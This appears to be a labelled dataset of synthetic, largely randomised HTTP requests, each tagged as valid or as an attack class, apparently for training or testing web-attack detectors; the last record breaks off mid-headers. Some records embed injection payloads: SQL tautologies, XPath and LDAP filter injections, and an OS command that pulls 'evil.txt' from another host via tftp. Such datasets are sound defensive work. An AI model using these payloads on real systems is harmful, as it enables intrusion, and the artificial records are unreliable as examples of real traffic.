Date: Thu, 11 Mar 10 05:54:01 UTC
ETag: "T7R-PajXniYdaIVIMa"
Expect: 100-continue
From: xalea@r7nedo.fr
If-Modified-Since: Wed, 16 Aug 06 23:11:00 GMT
If-Unmodified-Since: Tue, 06 Jul 04 14:15:25 CET
If-Match: "JopLzwIkSQX3VMyv"
If-None-Match: ".1prLMEqYw45D9i5VBC7"
If-Range: Sun, 06 Dec 09 17:54:08 UTC
Max-Forwards: 2
MIME-Version: 7.2
Pragma: ebjau='o5a'
Proxy-Authorization: mkd8c naeroilc=pleeis
Authorization: NTLM dGdhZVRvVmVldEMxZXp0c3F0bWJucGk3aWlhY09lQ2FEaWVoeGxzb3ludmVlcw==
Range: 820147-5,978-972,804-77
Referer: http://fwOai.st/Nois.tiff
TE: chunked;q=0.6
Trailer: Referer
User-Agent: wnot (wOGx13cf; cyKsFYKn4; ic@.bBvDFy)
UA-CPU: 68000
UA-Disp: 904,456,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 0689x744
Via: eodcdh/8.7 www.kIoa2.gif, 2.3 www.okDis.css
Transfer-Encoding: aylRf; nspySsy5=erh0i
Upgrade: nEsh/9.0, imfsa/9.1, dnt/4.8, 05t/6.8, pSsa8/7.7
Warning: 228 www.oikad9p.html "n7asOt" 
X-Forwarded-For: 216.94.170.227
X-Serial-Number: 92325368257
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27850
Start - Id: 21014
class: Valid
GET /oiEdOlOehihpet/ehb36rtuTf9ensn/uph4hxmrh/ettndtIW8/5n6DsmrlN9mrr/i6cx/leyeh.png?itu8tila=nh3indtaAtu&wAehiodWa=tto8isnrores2&dwnHrnisbtla=nbe&7eehnoh=977013&en9ztlo7L6=sbHjll&sLNm=dnsrklLeJac&bnoernoeni=ahktaa HTTP/1.0
Host: 32.206.246.233:80
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1254;q=0.7, windows-1258
Accept-Encoding: gzip
Accept-Language: oeie-rn9y6;q=0.2, XheEmtLh-abshlc7
Cache-Control: only-if-cached
Client-ip: 240.62.110.2
Cookie: soarail=c;tnmochan%tY;LdegmeItnueose6=oYaa;nfer0=5473
Cookie2: $Version="443"
Date: Sun, 25 Nov 07 04:49:17 CET
ETag: "yS7jeWo.CP_ngWA"
Expect: esiontj=ri4dlbaa
From: hrtiet@tsotaco.it
If-Modified-Since: Mon, 07 Mar 05 04:59:51 GMT
If-Unmodified-Since: Thu, 16 Apr 09 06:51:41 GMT
If-Match: "U-fipoTBaQN87v0TLY"
If-None-Match: *
If-Range: Wed, 18 May 05 15:12:46 CET
Max-Forwards: 7452
MIME-Version: 1.5
Pragma: ra3tshs='cxwdB'
Proxy-Authorization: Digest uri=/uoaaow/df49t/soboTieb/8h96.txt
Authorization: NTLM YWVlaWN4ZG9zMWFnZWF0dEdUaDczcGFmbmJzYWFycnpyZW4=
Range: 729-89313,-42549,64779-835298
Referer: /6d1li/p7Haoc/arEi/t7ce7tNe/oRoes.cgi
TE: gzip;q=0.7,trailers,chunked
Trailer: Cache-Control
User-Agent: Mozilla/1.6 (X11; U; SunOS sun4u 7.2; fe-dk; rv:1.1.5) Gecko/10656539
UA-CPU: 68000
UA-Disp: 3926,7980,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 985x390
Via: HTTP/1.4 240.11.83.239:61, 1.9 www.hhrqmn.gif, 4.2 www.matH.html:52206
Transfer-Encoding: gzip
Upgrade: bhme/4.1, ran/8.6
Warning: 199 41.92.136.197 "leoay" "Wed, 13 Jan 10 14:08:26 CET"
X-Forwarded-For: 255.69.11.121
X-Serial-Number: 650978480578430420
----: --------------
~~~~~: ~~~~~~~~~~

null

End - Id: 21014
Start - Id: 44558
class: OsCommanding
GET /2Jlx0VNR/es-Belyqh-Z/dt6ijwgT/hdna3slLhohinr.jpg?E21W3uil=cmi&meh9=5&f5e5ans=yYnwr%25name&nwtji2la=86985&Ehpme=%3Ao+%3Do&5rnehntw=%25eo%7Eudtadtse%7Cboot.inio&ehenele=etdnnngjzoNimituk&fR7IzvbscriptOT@0Zu=06354272&asAkb=varg&oart6=etghh+u&oaYe7y=adminwhere%27&t0Caa9a=6226&craai29UdlIrE=otO0a HTTP/1.0
Host: 157.162.134.115:363
Connection: keep-alive
Accept: video/mpeg;q=0.6
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: max-stale=368
Client-ip: 200.39.236.63
Cookie: ieieJerhdr=69;nrHAupnet=n<tTxmlisa+t9znullE;hotzagl=205.96.9.99|  tftp 192.168.10.33 evil.txt;loer=?v(ni;iswdnvbmisnve9e=n.WMD;P2v751r=cP4h3ryi@
If-Modified-Since: Wed, 14 Mar 07 23:25:29 GMT
If-Range: "F7hjjV8kqcyiKIQNUI"
Max-Forwards: 5
Pragma: no-cache
Authorization: Digest uri=/tDHm.asmx
Referer: http://a3iag.uk/h1dmayan/tieiaazp/ols36l6.gif
User-Agent: rtereehnn2ol
Transfer-Encoding: gzip
Warning: 708 www.aash.css "aoblonu7f6see0oj" 

null

End - Id: 44558
Start - Id: 35682
class: XPathInjection
GET /bH2oAatm79t_ZRycN/ajrulyoeo/Rfjeamoerl/gss9olntdripEsodo/ed/e5U4frQf_D5Xwj_/NOidvM/tTd.dll?eT7hnpeetnl=pkFCa_x8b3gU&D.Dssock_stream=8696071&oloqolh0ainenh=otz&slsncr=aTeozsnBe&Iyn8siso=hwd&dc=15&leosmntd0oNt=h4fj_cf&n9=6sUevp2tobeho&NuUia=Tgduy7h4c%5DEiu&jwear2ne22i27l=enarc5Okt&r2l=7+or+1%3C+aR%2Falttng%2Fshl%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D39%5D++or++2855%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27 HTTP/1.0
Host: 170.54.178.57
Connection: keep-alive
Accept: audio/*, application/*;q=0.2
Accept-Charset: us-ascii
Accept-Encoding: deflate
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 50.131.48.51
Cookie: 1gpUl9_WetcX=2345126810;ghjLVdelete=h:etfttoatmochaceoounionh;bses=7;oeoee=d6S3+;aiIgmtctgehtaix=t.Cl405fzD
Cookie2: $Version="063"
Date: Fri, 20 Jun 08 06:06:43 GMT
ETag: "isp-3O2gHWlDZdaAXSs"
Expect: Ezeho=Os1tt1;mhmA=nsgneoa
From: tgaZ6rhn@dneNoaa.uk
If-Modified-Since: Thu, 24 Apr 08 06:26:43 UTC
If-Unmodified-Since: Thu, 30 Sep 04 09:19:58 GMT
If-Match: "6Zc0t_nb7p0vZsKvoUtM"
If-None-Match: "@R3@SD-B85ptV0lMdYu"
If-Range: *
Max-Forwards: 6429
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: Digest username="tghlh"
Authorization: NTLM aHRlZ2VLaGFyd2F3ZHNyaWVjZXJvc050NXRmbXRodXZFcExueGJld3lrbnJlc24=
Range: -82,-22
Referer: http://www.cgNm.uk/aaooeWcn/hcEzh/ueAwr/yiOr.ace
TE: chunked;q=0.2,chunked;q=0.6,trailers
Trailer: From
User-Agent: oe90nn0ut
UA-CPU: x86
UA-Disp: 466,505,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 2667x788
Via: 8.8 86.46.65.221, 2.3 81.113.129.190, FTP/1.3 www.td8tP.shtml:1
Transfer-Encoding: albn; mniyi=enrne
Upgrade: pnarot/3.1, 7tgym/1.5
Warning: 134 179.206.30.120 "oxtqt" "Tue, 25 Sep 07 03:29:34 CET"
X-Forwarded-For: 214.86.27.10
X-Serial-Number: 727389738621693748
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35682
Start - Id: 23806
class: Valid
GET /s1eib4ato52oh/otwwszheHdE7lwi1/h3jcaeddntntoaiRtype/eo9letao.css?Zagrvshy=7177590&B.QWQ0FrmIO.n=3%5Ca&0dun2t0saIHl=61048040&l7hd09aoynI8=bO+nhf1t&mlcg1dteqcm5sfE=13827&ddthsMNueeawea=eeservicesetelnetradexec+yxaGdtlinkr&jmmaehxdAisag9g=-cincludeooedivs+ideai+&ed3g0ac=dqjH&ap=eCToRK9fPFT&Iho82an=06333336&dSbsE5zqzX=i&UfNbqBa=u8o%40_&ns8nhesu=nBY&1tXkeae=h++xinsert HTTP/1.1
Host: www.hjswetk.net
Connection: mbro
Accept: image/*;q=0.8, application/*, application/postscript;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ue5sxt-r;q=0.7, a6-wf7sags, v1-e
Cache-Control: min-fresh=64
Client-ip: 42.216.100.133
Cookie: hze9h8hr2an=h;pheeohfaSt3n=683733;1atreoYc2=ngcctNieaEsae
Cookie2: $Version="72"
Date: Thu, 25 Sep 08 21:02:21 UTC
ETag: "jqSsuoDhZLg_Ldm0_k"
Expect: nOPhnawz
From: rntqivt@uiudd.fr
If-Modified-Since: Thu, 21 Aug 08 03:42:42 UTC
If-Unmodified-Since: Sat, 19 Nov 05 17:37:10 UTC
If-Match: *
If-None-Match: *
If-Range: "bgohyqRKrp0gq5Aw9K"
Max-Forwards: 29
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: NTLM ckRTdG5mZXJvVXNvc2VvZ0cydGV4TG95MXJ4cmYyb2Zib25jaWNrZWV5YXJpMA==
Authorization: Digest qop=auth-int
Range: 323-
Referer: /1nzij.zip
TE: gzip;q=0.8,deflate,trailers
Trailer: From
User-Agent: Mozilla/8.1 (Windows; U; Win 9x 4.0; nh-3s; rv:7.6.8) Gecko/28066035
UA-CPU: PowerPC
UA-Disp: 363,234,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 9800x454
Via: FTP/2.0 37.35.88.116
Transfer-Encoding: compress
Upgrade: rae/8.5, ne4/3.3, e4ck/8.2, 0teaus/2.2
Warning: 649 www.aAvheed.png "dS6Fnimdaari" 
X-Forwarded-For: 151.135.237.72
X-Serial-Number: 28931730
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23806
Start - Id: 34945
class: Valid
PUT /ywheregQ1or1VTZ7xp_@9/arcej/HLservices2pO7O-UC/oW/3rbidai1mHRudpliblml/zKg@JP@okhzpj/05Ok6gmt/4ttGEdrop.htm? HTTP/1.0
Content-Length: 18
Content-Language: tm7klji,teo,3doogcc
Content-Encoding: identity
Content-Location: /a94Ehael/9eat/hltocf8g/rdkttdho/xooigmg.jpeg
Content-MD5: bXV0ZWFlN3VzcnU2b2NrYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 10 Jan 08 23:59:18 CET
Last-Modified: Fri, 09 Mar 07 02:31:24 CET
Host: www.alfedetq.com
Connection: close
Accept: */*
Accept-Charset: iso-8859-5
Accept-Encoding: *
Accept-Language: reA-a4i1zstl, ou-Tul;q=0.6, eimib-f
Cache-Control: max-age=276
Client-ip: 157.196.232.187
Cookie: aeEe=rhrd3se;eeli=13;.lWN-YV=74948123
Cookie2: $Version="2"
Date: Wed, 21 Jan 09 11:37:16 UTC
ETag: "93xQVUMgjmj97FE8zt"
Expect: gittt0=mpzcmnee
From: soKglR4e@aepbstrn.st
If-Modified-Since: Tue, 05 Dec 06 05:14:54 UTC
If-Unmodified-Since: Sun, 13 Mar 05 19:08:26 UTC
If-Match: "wVAAgWsrl5rJSYV"
If-None-Match: "0M1woQ2Qw@xT.XYyXHs"
If-Range: Wed, 12 Aug 09 04:50:37 GMT
Max-Forwards: 560
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: NTLM cmNpdmVwZW5pdHQwZWVJRXNoamlsaGVvdTRlZWVlc21sdHJCaVV0Y3F0ZTZmSWVv
Range: 26302-,-510,4934-
Referer: http://www.hgye.it/oPpfy.js
TE: trailers,trailers,gzip
Trailer: If-Range
User-Agent: Mozilla/5.9 (compatible; ernuiHiae; Solaris; r0ont2ya8; Udf4u; Ameaegk)
UA-CPU: x86
UA-Disp: 7242,197,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 2815x3082
Via: 8.8 www.itrc.tiff:1734, Kue/1.2 www.S5Eto.shtml
Transfer-Encoding: compress
Upgrade: hwo/3.6, TErrh/3.9, hiOn/8.6
Warning: 837 www.kehN6nna.htm "8qpIoylmmte3l" 
X-Forwarded-For: 69.156.101.181
X-Serial-Number: 755245432377424
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

CacceptM@IXS=0ZUCx

End - Id: 34945
Start - Id: 37213
class: LdapInjection
GET /yd6r2dknne/auyErY3/ocbsL3ea60a9t/apb/enfmirgltqoem8e/clnrLoisncb/m2wV/fGcT@KfEHm.php3?og11ieotoyc=a3b&v3tinnIbaeshee=sr&ccnzbrWmtne=ihinraanin9&EttddhdOh=b%2Bt%29d%25uAeuju%25oinputl&viieTeowf=%3Ebiny&za9d=ixa%29%28%26%28objectClass%3D+++oQt*%29&ottroazaesehoe=cr%3AstyleI&paec8eco=03&eLiEa=nAHcM-AXK8ZY&tsfeia=p&hwsrssevd=3&oSutha=zHWHEeewJ0&xgyuhe1=nvdl HTTP/1.0
Host: 174.131.142.204
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 98.210.207.217
Cookie: rvtzacoidtce=fqwZKBw0x8;evtEoeepa2TOp=558601351
Cookie2: $Version="43"
Date: Fri, 29 Oct 04 17:27:32 CET
ETag: W/"nGU3RVy8tOKIK4L"
Expect: 100-continue
From: ejgouV@q9tOejr.uk
If-Modified-Since: Thu, 04 Sep 08 19:47:21 GMT
If-Unmodified-Since: Thu, 10 Apr 08 03:01:15 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 27 Aug 05 07:08:37 CET
Max-Forwards: 2149
MIME-Version: 2.5
Pragma: 5Psnuut='iawaails'
Proxy-Authorization: Digest realm
Authorization: Basic ZWxiNTpydDMw
Range: -906
Referer: /rAttvb/wttfwf.exe
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/7.3 (compatible; Konqueror/3.8; Unix; od5tnBt; htdu; boydss)
UA-CPU: Sparc
UA-Disp: 4047,0109,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 0874x8291
Via: FTP/5.4 www.m9rtzhn.jpg, 3.3 139.27.23.30, 1.3 80.178.67.6
Transfer-Encoding: compress
Upgrade: etyvet/1.7, 9mEHd/4.9, saaq/1.8, 9irhSi/8.2, ooten3/4.3
Warning: 553 www.Nftmdh.html "rnvarnu59oDgV" "Mon, 31 Oct 05 08:57:55 UTC"
X-Forwarded-For: 217.7.45.94
X-Serial-Number: 973297601016037015
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37213
Start - Id: 20400
class: Valid
GET /i2/sarstttorb3nizew1/dJetgczUjioXzicincL/lT/liW-h2d@nev0G/r3the4he/mlsO1h.bin?desep5auuzaite=nEl&krynizs=hsha+e0d&sircoenahRoneo=sotoffemnnat HTTP/1.0
Host: 25.220.12.174
Connection: keep-alive
Accept: video/*;q=0.6, video/quicktime
Accept-Charset: cp-932;q=0.5, iso-8859-8;q=0.6, cp-950;q=0.4, iso-8859-3, iso-8859-3;q=0.0
Accept-Encoding: compress;q=0.6, gzip, deflate;q=0.1
Accept-Language: *;q=0.7
Cache-Control: min-fresh=008
Client-ip: 229.137.134.223
Cookie: me=aot+Tqau=httpsn
Cookie2: $Version="55"
Date: Fri, 09 Oct 09 06:55:02 UTC
ETag: "3n@nt6ZNQcdSJtEWD"
Expect: rolLeh
From: mrrsjl@ngetczrtne.ch
If-Modified-Since: Sun, 30 Apr 06 20:43:47 CET
If-Unmodified-Since: Sat, 11 Oct 08 22:19:47 CET
If-Match: "2TzEKO2WZIemU3Dm8"
If-None-Match: "Jy1-8Yd@6JwU48kYmZTY"
If-Range: "Gkm3b5gqNPij.RLjo@"
Max-Forwards: 28
MIME-Version: 8.6
Pragma: PfDmstK='uirg'
Proxy-Authorization: Basic clNvM2I6ZTNzYQ==
Authorization: NTLM bWVOZGNzNHVzcW9zZHQ2ZW9xYXlic2t0dWVlWGR1dDg=
Range: -21727,-97
Referer: /shn7roo/gtsfnyqs/tncc6dls/soalmh/dornus.cfm
TE: chunked,trailers
Trailer: Authorization
User-Agent: ukPbo7fh (ePQDMw_; teluIh)
UA-CPU: 68000
UA-Disp: 767,3451,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 637x370
Via: FTP/1.6 www.6riia2co.png:1162, 1.6 www.aiSh.gif, FTP/4.2 194.170.178.218
Transfer-Encoding: identity
Upgrade: otcmsa/8.6, iEye/1.3, dkmh/3.7, otrl/7.1
Warning: 661 www.mldrEo.jpg "sastyHb1estenvw" 
X-Forwarded-For: 92.6.156.80
X-Serial-Number: 13904679569976
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20400
Start - Id: 41542
class: SqlInjection
POST /7O.ip-wwIb-3aCY4D46g/gSKW1N2SgX/e403S1MoNMZ-LMsz9P5R/ajQ/en/zSplra/dN8ialteecnSd.htm? HTTP/1.1
Content-Length: 311
Content-Language: qikgIylt
Content-Encoding: identity
Content-Location: /Oit46r/asefraD/AvSyr.msf
Content-MD5: ZXNuZ2RSbXR0Z2k1MHRzaA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 09 Feb 04 22:57:46 UTC
Last-Modified: Tue, 12 Apr 05 06:59:27 UTC
Host: www.yt0ih.org
Connection: keep-alive
Accept: video/*
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: eqyTeiea-k6iaexys;q=0.3, ytItanlg-i, eqaj-ygfoey;q=0.7, q-0nAimir;q=0.6, ftyoVw7-ssttir
Cache-Control: only-if-cached
Client-ip: 163.65.132.10
Cookie: oo=ohe6letixnouhi;iA7heemSe5Oa7e3=45;JED1@Pdelete=pAaodaezwinfrometw;f0xZt-W9kL=otinTm6eh3c8;rNhkoe=U<s
Cookie2: $Version="56"
Date: Sat, 15 May 04 17:33:38 UTC
ETag: "qo-CqRFe0Y2GKt.7"
Expect: 100-continue
From: nqoEyii@sdULboEa.uk
If-Modified-Since: Mon, 17 Sep 07 21:23:51 CET
If-Unmodified-Since: Fri, 06 Feb 09 14:21:04 CET
If-Match: *
If-None-Match: "UHNrazTKHgQDUUR"
If-Range: *
Max-Forwards: 577
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: NTLM VGlESGVlZTFrMWFGNDJmbTltdDVMbzdzcmJ0dGU1d2hvaGVO
Authorization: NTLM b1NkNExldDRuUHNpbThyaElsc2Jlb3A5dW5pbmNlaHN1aW5haQ==
Range: 57094-3
Referer: http://www.t3g5.fr/Eibhb/eoHeothe.conf
TE: trailers,chunked
Trailer: Expect
User-Agent: yolm/7.3.3
UA-CPU: StrongARM
UA-OS: Linux
UA-Color: color8
UA-Pixels: 3289x1691
Via: HTTP/4.1 193.19.103.148, hesB8e/5.7 46.113.215.20
Transfer-Encoding: deflate
Upgrade: itaut/3.7, drtrlo/0.9
Warning: 751 www.Lnbf.js "segwzwse" 
----: ----------

b7ob3btdknovo=467533&iaxitmsu=854551&7ujfbgsoundeFGps=9176725&kf17jat=8eo8ekkrtaycnttoad&qcpceaonlnn=Fh qe&mzuaa4=mpXFdrf&fgoYaboRip=4&eiainhti=64R2hfB_jm8J&aecknoiude10e=114    or id>1 or   ls_id<040999&cezeinot=thgeu&ike3eecrm=&5t&m3rsoerswgnLkt=oheoaieeo&hs34tf8rroio=heoldtaht&hgebqw=telIsh&6QkaE=al3t

End - Id: 41542
Start - Id: 35279
class: SqlInjection
GET /3PF_0il@6WH6Ps.cfm?nocljlpp7o=e7ah+ho&xQ_zevalFfMao=dwuFqs&REvG-nC4Bu=ghnbqrfh7&4Nrawnett=2112058&ttrh=rhgaotehrter&-Vmprocessing-instructionetce=eNYBUSQQQ&o6uhesyerlunln=on&maKvar=OR++++45343606%3D45343606 HTTP/1.0
Host: www.pcpt.com
Connection: keep-alive
Accept: image/gif;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 155.132.155.102
Cookie: 2icmaPHf=cUaryi;Qss3=417665
Cookie2: $Version="309"
Date: Fri, 24 Dec 04 19:14:52 CET
ETag: W/"K-NkvRrlLf6gBjMEc3V"
Expect: 4onddn=eeoa33k;1ertegD=xiSjeb90
From: B9ir@tOlwn.gov
If-Modified-Since: Tue, 22 Aug 06 09:56:55 CET
If-Unmodified-Since: Fri, 11 Jul 08 13:06:21 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 03 Jan 04 20:25:58 CET
Max-Forwards: 664
MIME-Version: 8.3
Pragma: ajr='elrosis7'
Proxy-Authorization: Digest cnonce="oCgves"
Authorization: Digest nc=2CdfbeAc
Range: 930-456,2355-
Referer: /hbrrtt/u0elt/eUyta.tiff
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/5.1 (Machintosh; U; PPC 4.7; cl-oq; rv:9.5.6) Gecko/82775151
UA-CPU: StrongARM
UA-Disp: 420,4746,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 827x876
Via: HTTP/2.9 232.39.23.92
Transfer-Encoding: compress
Upgrade: caha/7.7
Warning: 590 39.82.178.253 "aiHe" 
X-Forwarded-For: 162.78.14.7
X-Serial-Number: 045069362668
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35279
Start - Id: 20993
class: Valid
GET /veupnofecsa6cd/sD2X06a90/z2xwt-VLK-/betweenGdivqchild-dQIpfbe/fVjNC/62bkqmHhttpVautoexec/hsyTR.shtml?rcro1l3Itrs=ypXItMQVP&5oee6Fgtelnetd6=msuxtermrshometwyiie%26&eottgoaaeited=1706331053&oW4havingV6N=evoa2oon9&ar5teah=cshutdownlal%24gesokBsetmpnwgetgroup+by&nItete2sa6=8eid&4o7ofzdUpkG=1604501&yktneay8rk=ips&sIisid0ahi3=63392&odndle7ncfin5e=rhhtc&C0passwds=ote&-iinput9Gb=6264&19iaoueae30LfN=nOsaialhr&_G7mKWRIb=rdhVcxJVC HTTP/1.0
Host: www.ipraeE.ch
Connection: vlUo
Accept: text/*;q=0.1, video/*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 190.238.167.107
Cookie: 8n=7286;lasLe=t@jykJkVG
Cookie2: $Version="40"
Date: Thu, 11 May 06 14:14:05 CET
ETag: "S7dOFY9qGkegqB6"
Expect: 100-continue
From: ahynt@dfll.st
If-Modified-Since: Sun, 18 May 08 05:07:27 GMT
If-Unmodified-Since: Tue, 08 Aug 06 20:11:26 CET
If-Match: *
If-None-Match: "6dWOhMQKoFtfF8ch-XE"
If-Range: *
Max-Forwards: 4598
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: taay MaVfmd=b1vtgae
Authorization: sr4att hmteT=brtil
Range: 8-7,-0713,855020-
Referer: http://www.ictinm7.net/0ipt/t9hpa6t.tiff
TE: trailers,chunked;q=0.3
Trailer: Pragma
User-Agent: ettl/5.6.9.2
UA-CPU: 68000
UA-Disp: 665,0570,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 627x4845
Via: FTP/1.9 167.125.154.3, FTP/3.2 www.AsrEhwea.jpg, FTP/3.3 www.sAle.gif
Transfer-Encoding: uenuan; ea16il7e=fteoLs
Upgrade: wrn/1.7, tal/7.3, xhsnbh/3.1, taut/3.1
Warning: 723 www.jqsOhsod.jpeg "oaec" "Mon, 17 May 04 15:05:20 GMT"
X-Forwarded-For: 124.152.206.172
X-Serial-Number: 72612328248662320095
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20993
Start - Id: 15454
class: Valid
GET /3s_3pyz.fJ./roee/oPqx5V/Y9.K39.php4?oeldoim2Yhove=oHO&e5doeKaipr=468228567&tee5m=r%2FjT%27u4n%3At%26veAI&qpth2ii=4510991&Tfsis4=uaf&5OpOI=1138503&8ektIbcsauneLGv=147&7zfy7ectoga0mae=8&hec=j HTTP/1.0
Host: 55.153.178.101
Connection: lbss
Accept: */*
Accept-Charset: shift_jis;q=0.0
Accept-Encoding: *;q=0.2
Accept-Language: Iisito-mrt;q=0.2, inaaxn-gazilsa5, erf-hu;q=0.9, asb5-e;q=0.5
Cache-Control: i=rdj4u
Client-ip: 226.73.227.194
Cookie: 5Iy=31258;rrqbEcSalglotr=iqkk;vezotaada9o=s9'g;mSfcLbe=iDTPOGa6m0
Cookie2: $Version="967"
Date: Tue, 24 Feb 09 11:42:26 GMT
ETag: "B838Jk6u.UI@-Bc25aXp"
Expect: eihh
From: hreEo@mhtthLrava.org
If-Modified-Since: Tue, 20 Jun 06 01:58:45 GMT
If-Unmodified-Since: Sat, 28 Nov 09 13:17:08 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 25 Oct 04 16:09:08 CET
Max-Forwards: 472
MIME-Version: 4.5
Pragma: toiaaer='vniegt'
Proxy-Authorization: NTLM NWZ6b3Q2aWV0aEVOdGFhZ3Jhd2FlRWpFYXJlM2Vzd0VjZUE=
Authorization: NTLM bmRremhlMHRlZDhmdER0dGpzdDVTcmVobG5UM3plZW5tc2xj
Range: -54263
Referer: http://fnnnLieo.cz/ah0nCXhr/lnbdhidh.png
TE: gzip;q=0.2,trailers
Trailer: Pragma
User-Agent: a9oX70dntt (v_.gh@d8; sYeJgxA; nbJvGuNS6)
UA-CPU: PowerPC
UA-Disp: 0411,934,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 1725x7516
Via: 6.7 141.181.66.53
Transfer-Encoding: compress
Upgrade: oaai/4.0, e9n6fi/8.4, Gqhe/6.6, n3iid/9.5, y6n9/2.9
Warning: 569 www.Fu27pmk.js "2eoaar" "Thu, 15 May 08 10:27:48 GMT"
X-Forwarded-For: 23.106.63.82
X-Serial-Number: 5314267
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15454
Start - Id: 1201
class: Valid
GET /vfiom/yostoe9a9pdsts/1is/m4d7ochhire/tDwg_TC/dJuBEwC5KB5m/e5CWlN.NyxE51iY-gmbC/smiBIe/il.js?wophtpeee=830809&78y.PLboot.iniwinntVI.2=332973393&neipTkNeriq=pnarA1n&iTtnUesl9bj2=0653158 HTTP/1.0
Host: www.Dewda.st:80
Connection: alcAjr9
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: identity, identity, gzip;q=0.9, deflate, gzip
Accept-Language: 2i8fpuyo-qm;q=0.8, f4crp-5eesh;q=0.7, lplersmv-nm;q=0.9, lmai-ohee;q=0.6, d-ertoj
Cache-Control: no-transform
Client-ip: 162.252.92.93
Cookie: rKSzrz6=srrcpdnNtsgtFd3nyv;2PB4LjRlog=rtowjm 3tbi\ tte-t;derhrw=9;eeFdkspn=440601
Cookie2: $Version="977"
Date: Wed, 12 Jan 05 19:13:21 CET
ETag: "4G0pm5zalxbPsp_0"
Expect: danahdn=hysdtni
From: stkJu@ixghnIjuI.org
If-Modified-Since: Sat, 09 Oct 04 23:51:56 CET
If-Unmodified-Since: Sat, 13 Aug 05 17:13:38 UTC
If-Match: "sVF2j0G34cod.MAqLn"
If-None-Match: *
If-Range: Sat, 10 Nov 07 07:22:42 GMT
Max-Forwards: 892
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: NTLM bjRvYWhzYWxxcmUwc2VhcHNvTzRvYXhoaHQ4NEFhZFRodWVJaWdsZW9zcw==
Authorization: NTLM RGthc25kdk1uYWVhM3NhYnFvamlobmRmam5pcDVpaDNpc3NhY29vZXJvZ1Flcw==
Range: 98-464662,0-189052,-66419
Referer: http://www.sjiue.gov/mbuwfiei/rEtaf.doc
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.9 (compatible; Konqueror/1.3; Linux i386; Rp7rsjsist; mNmrnetsu)
UA-CPU: PowerPC
UA-Disp: 3549,296,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 6451x169
Via: HTTP/4.0 133.110.202.221, 0.8 113.105.199.192
Transfer-Encoding: 3tss96
Upgrade: u6r/6.7
Warning: 000 44.117.86.117 "8eny" 
X-Forwarded-For: 161.167.26.165
X-Serial-Number: 6555441060266174
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1201
Start - Id: 16412
class: Valid
GET /@6Qk4bO3@wget/ti8starUuwa6s/nrJIwtLnhwgYu.shtml?mtderemttnls=psshaijst76q%3FeeOservicesN6s&taPehsamtttnzsb=r%2B&43oIetfatee6dut=bn9inodneBtNu&4v=r0J&xeto=028 HTTP/1.0
Host: www.8sto.be
Connection: keep-alive
Accept: video/*;q=0.2, image/jpeg;q=0.4, text/xml;q=0.5
Accept-Charset: x-mac-chinesetrad;q=0.4
Accept-Encoding: compress, gzip;q=0.9, deflate;q=0.1, deflate;q=0.3, identity
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 81.220.56.31
Cookie: xsameqb7C7baaw=595876
Cookie2: $Version="92"
Date: Fri, 28 Mar 08 11:55:58 UTC
ETag: W/"_smcwUlFm.TISm7S0F"
Expect: 100-continue
From: setosoE@eiteajn.be
If-Modified-Since: Sat, 12 Nov 05 17:45:33 CET
